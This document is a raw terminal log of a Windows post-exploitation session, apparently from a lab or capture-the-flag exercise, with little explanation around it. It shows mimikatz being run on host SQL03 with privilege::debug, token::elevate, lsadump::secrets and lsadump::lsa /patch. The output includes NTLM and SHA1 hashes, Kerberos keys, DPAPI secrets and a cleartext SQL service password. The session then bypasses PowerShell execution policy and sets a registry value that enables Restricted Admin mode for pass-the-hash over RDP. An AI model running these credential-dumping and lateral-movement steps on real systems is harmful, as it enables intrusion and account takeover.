* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 34991 (00000000:000088af)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 33774 (00000000:000083ee)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID :
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/29/2021 11:21:21 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 53784 (00000000:0000d218)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/29/2021 11:21:20 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL03$
* Domain : FINAL
* NTLM : c52a092a8e12c89fda86819b12f06a06
* SHA1 : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : SQL03$
* Domain : final.com
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SQL03$
Domain : FINAL
Logon Server : (null)
Logon Time : 12/29/2021 11:21:19 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SQL03$
* Domain : FINAL
* Password : (null)
kerberos :
* Username : sql03$
* Domain : FINAL.COM
* Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
ssp :
credman :
mimikatz(commandline) # exitmimikatz.exe
ERROR mimikatz_doLocal ; "exitmimikatz.exe" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
496 {0;000003e7} 1 D 29104 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 3324420 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,31p) Primary
* Thread Token : {0;000003e7} 1 D 3351614 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::secrets
Domain : SQL03
SysKey : 562deb73c83d0df88f596eb89103d27d
Local name : SQL03 ( S-1-5-21-4076639736-4188291740-2971731876 )
Domain name : FINAL ( S-1-5-21-1725955968-4040474791-670206374 )
Domain FQDN : final.com
Policy subsystem is : 1.18
LSA Key(s) : 1, default {f2b4134f-b603-24ed-8f97-dc175179f8de}
[00] {f2b4134f-b603-24ed-8f97-dc175179f8de} e37f84f177cb60768f3bb3686f725cd328c9bdbcd33f998e04f0fc6748c4e576
Secret : $MACHINE.ACC
cur/hex : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc
NTLM:c52a092a8e12c89fda86819b12f06a06
SHA1:204368033a4dcbfb1eb8c2cd3803bce84009c83a
old/hex : c8 a0 fb 2b 03 4e e7 05 4f 8c 77 72 aa 13 40 f1 13 05 40 ae 41 fd bf cf f8 7e 11 e6 91 ea 3c 2c fd 2a c7 cd 51 90 82 67 0c 10 55 c2 bc d0 6e c2 ca 56 32 53 a9 05 fe d2 15 07 30 37 a3 14 53 c7 4e 00 e5 69 3f c9 29 53 7a e8 00 91 ab 5f 9d 0f d9 02 c6 b4 2e 18 f7 83 88 df 26 e6 0b 96 03 09 28 0a 27 a8 84 be bd d1 4a e2 80 82 83 52 8c 3a b5 a1 f3 8f 27 36 a4 78 02 d4 82 ee 6c dc fa 57 4e af 41 1b 77 fd 90 3e c3 ff 56 0a 18 a4 f3 54 24 81 2d e9 32 04 aa 64 43 9f 52 78 92 71 88 71 2a 19 15 f0 a0 5a 61 2c 67 47 e9 68 e6 f9 62 bc 4c d4 28 e3 d3 ab ad e7 39 e6 6c ca bb 3c 47 da 45 d4 8b 7f 08 db ee aa 4c 3c 7b 86 2b 52 9d 34 24 ed 68 ec e5 25 b2 9c be 5b 7a 7e 6c 34 21 89 23 ab 53 21 f1 34 2d 86 a1 49 88 77 98 3b 90 23
NTLM:64ccfbf68a6704d22bb7ee1ee4bb6e3d
SHA1:14af3cf89ff373ad9c5e64cdf35492b1e22a11d0
Secret : DefaultPassword
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 51 e2 e0 e5 6e 4a 97 18 3d 56 27 39 4f 86 cf 5c 1b 2b a4 c3 69 3d 96 dc cd ee f6 49 59 2b e8 f2 44 85 2d b9 a4 1d 79 9e
full: 51e2e0e56e4a97183d5627394f86cf5c1b2ba4c3693d96dccdeef649592be8f244852db9a41d799e
m/u : 51e2e0e56e4a97183d5627394f86cf5c1b2ba4c3 / 693d96dccdeef649592be8f244852db9a41d799e
old/hex : 01 00 00 00 ee 7e 43 bc 31 86 7d 26 06 75 b3 0d 89 94 ef 3e b3 56 42 9a 55 6d d1 ae f8 a0 e3 e8 7c 12 4d 01 59 6c 16 fd 34 19 00 a1
full: ee7e43bc31867d260675b30d8994ef3eb356429a556dd1aef8a0e3e87c124d01596c16fd341900a1
m/u : ee7e43bc31867d260675b30d8994ef3eb356429a / 556dd1aef8a0e3e87c124d01596c16fd341900a1
Secret : NL$KM
cur/hex : b8 82 e2 17 71 1e 75 5c 05 26 0f 43 f2 be 0d a3 9d cc e5 ae d4 b5 d5 be 6b fe 72 da 0d cc cb 10 26 70 af d3 b7 5e d8 ba bf 34 51 cc e5 0b 6a 9e e8 76 bb fe 8b be 60 38 7d fc 47 d1 ca 12 fe 35
old/hex : b8 82 e2 17 71 1e 75 5c 05 26 0f 43 f2 be 0d a3 9d cc e5 ae d4 b5 d5 be 6b fe 72 da 0d cc cb 10 26 70 af d3 b7 5e d8 ba bf 34 51 cc e5 0b 6a 9e e8 76 bb fe 8b be 60 38 7d fc 47 d1 ca 12 fe 35
Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: 89sdfDSFksolds34f
Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\\SQLTELEMETRY$SQLEXPRESS
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
496 {0;000003e7} 1 D 29104 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 3353968 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,31p) Primary
* Thread Token : {0;000003e7} 1 D 3380887 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::lsa /patch
Domain : SQL03 / S-1-5-21-4076639736-4188291740-2971731876
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : **8388d07604009d14cbb78f7d37b9e887**
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000003e9 (1001)
User : setup
LM :
NTLM : 1fd7eecf8c3c358597ffe32797ed01e9
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : a19e10c7c74cfdbbe0b52b7db1c43025
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Users\\Administrator\\Desktop> **New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force**
New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
DisableRestrictedAdmin : 0
PSPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa
PSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\\Registry
参考教程P505